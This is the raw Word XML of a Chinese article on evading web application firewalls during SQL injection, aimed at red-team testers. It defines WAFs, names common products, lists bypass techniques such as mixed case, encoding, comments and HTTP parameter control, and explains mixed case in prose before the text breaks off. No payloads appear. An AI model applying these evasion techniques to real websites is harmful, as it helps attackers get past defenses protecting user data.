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70463">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>SQL注入绕WAF研究</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01889B23">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="B0B0B0" w:sz="16" w:space="38"/>
        </w:pBdr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="u1e9d8a9b"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="808080"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>前言：在如今WAF泛滥的一个互联网环境中，一名优秀的红队攻击手应掌握各种绕WAF手法，如此才能与WAF对抗，拿下目标Flag，本文以Mysql数据库举例，对SQL注入绕WAF进行研究分析</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="53BF1B9B">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="HNl15"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>1、WAF相关概念</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="1"/>
    <w:p w14:paraId="23F46904">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="u9164b516"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>WAF，全称：Web Application Firewall，也称为网站应用级入侵防御系统。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="2"/>
    <w:p w14:paraId="224E39ED">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="u8507639c"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>大白话的说，就是利用它内设的安全策略来为web应用程序提供保护的一款产品，那么对于我们来说，如果突破它的安全策略就显得尤为重要。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="3"/>
    <w:p w14:paraId="2BC7CE4B">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="uc8da47c5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>作为渗透测试人员都知道，在渗透的过程当中，最核心的就是构造自己的输入，然后分析目标返回的结果，从而判断出是否存在相应的问题。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="4"/>
    <w:p w14:paraId="43698575">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="u83856def"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>那么WAF的基础检测机制也基于此——检测用户输入的内容，如果输入的内容中包含了一些危险字符，或者说有威胁性的字符，那么WAF就会对此进行拦截。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="5"/>
    <w:p w14:paraId="786F6ED2">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="ue1819b02"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>所以说，改变我们输入的内容形式，就是突破WAF的关键点。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="6"/>
    <w:p w14:paraId="171E3AF3">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="wJrjq"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>1.1、WAF的介绍及分类</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="7"/>
    <w:p w14:paraId="51461CF1">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="ub3b12123"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>waf分为硬件防火墙和软件防火墙,其中硬件防火墙出自各大安全公司,价格昂贵,一般大公司才会购买;软件防火墙相对便宜,小公司使用较多。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="8"/>
    <w:p w14:paraId="2BCADF7D">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="u91a1c9d0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>现在国内互联网中常见的waf软件有以下三种:</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="9"/>
    <w:p w14:paraId="67FC03CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="u148c5e75"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>安全狗(更新缓慢容易绕过)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="10"/>
    <w:p w14:paraId="50A4191F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="uec222a70"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>宝塔(免费版</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>和收费版)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="11"/>
    <w:p w14:paraId="313D3C2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="u9fca1f74"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>阿里云盾(阿里云服务器自带,也叫安骑士)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="12"/>
    <w:p w14:paraId="343CA10A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="u552fd966"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>云waf(云锁,360安全云等)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="13"/>
    <w:p w14:paraId="2A501280">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="Eif6t"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>1.2、WAF的常见特征</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="14"/>
    <w:p w14:paraId="38240217">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="u77c19198"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>之所以要谈到WAF的常见特征，是为了更好的了解WAF的运行机制，这样就能增加几分绕过的机会了。本文不对WAF做详细介绍，只谈及几点相关的。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="15"/>
    <w:p w14:paraId="5986D938">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="u90aca015"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>总体来说，WAF(Web Application Firewall)的具有以下四个方面的功能：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="16"/>
    <w:p w14:paraId="38EBF313">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="u1f3f3226"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>1. 审计设备：用来截获所有HTTP数据或者仅仅满足某些规则的会话</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="17"/>
    <w:p w14:paraId="6139D54F">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="u512100fa"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2. 访问控制设备：用来控制对Web应用的访问，既包括主动安全模式也包括被动安全模式</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="18"/>
    <w:p w14:paraId="23A76FDF">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="ud4b31dfa"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3. 架构/网络设计工具：当运行在反向代理模式，他们被用来分配职能，集中控制，虚拟基础结构等。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="19"/>
    <w:p w14:paraId="38E5F7B0">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="u8250e2d5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4. WEB应用加固工具：这些功能增强被保护Web应用的安全性，它不仅能够屏蔽WEB应用固有弱点，而且能够保护WEB应用编程错误导致的安全隐患。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:p w14:paraId="08FBA362">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="RSOb0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>1.3、WAF的常见特点</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="21"/>
    <w:p w14:paraId="289D6DC3">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="u549dab39"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>异常检测协议：拒绝不符合HTTP标准的请求</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="22"/>
    <w:p w14:paraId="1B25E522">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="uc5fe3214"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>增强的输入验证：代理和服务端的验证，而不只是限于客户端验证</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="23"/>
    <w:p w14:paraId="09814898">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="uba5337b9"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>白名单&amp;黑名单：白名单适用于稳定的We应用，黑名单适合处理已知问题</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="24"/>
    <w:p w14:paraId="4CE13477">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="u5255cd4c"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>基于规则和基于异常的保护：基于规则更多的依赖黑名单机制，基于异常更为灵活</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="25"/>
    <w:p w14:paraId="2602D058">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="uf00f96b2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>状态管理：重点进行会话保护</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="26"/>
    <w:p w14:paraId="43253D97">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="u64af4956"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>另还有：Coikies保护、抗入侵规避技术、响应监视和信息泄露保护等</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="27"/>
    <w:p w14:paraId="66B84075">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="ly894"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>2.ByPass常见手法</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="28"/>
    <w:p w14:paraId="306BCF39">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="ud49921ec"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>大小写混合</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="29"/>
    <w:p w14:paraId="3FF5A983">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="uabd2f4c4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>替换关键字</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="30"/>
    <w:p w14:paraId="32911955">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="u5987a1eb"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>使用编码</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="31"/>
    <w:p w14:paraId="4122754F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="u400b9ed7"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>使用注释</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="32"/>
    <w:p w14:paraId="6BE575A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="ud2809356"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>等价函数与命令</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="33"/>
    <w:p w14:paraId="0C0CCB48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="u2147c3a4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>使用特殊符号</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="34"/>
    <w:p w14:paraId="6299F228">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="u92fb4aef"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>HTTP参数控制</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="35"/>
    <w:p w14:paraId="5D1D951B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="u87141fb9"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>缓冲区溢出</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="36"/>
    <w:p w14:paraId="0B13BD00">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="u5f35d973"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>整合绕过</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="37"/>
    <w:p w14:paraId="1289C61E">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="XL4p1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>2.1 大小写混合</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="38"/>
    <w:p w14:paraId="64824C37">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="u1e0f2239"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 这种绕过方式适用于阻塞过滤器不聪明的时候，也就说当阻塞过滤器的过滤规则只是对关键字符进行限制约束而过滤过程中并没有对关键字组成进行深入分析，而导致只是对关键字整体进行了过滤的问题。。。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="39"/>
    <w:p w14:paraId="705BE731">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="zveH0"/>
      <w:r>
        <w:rPr>
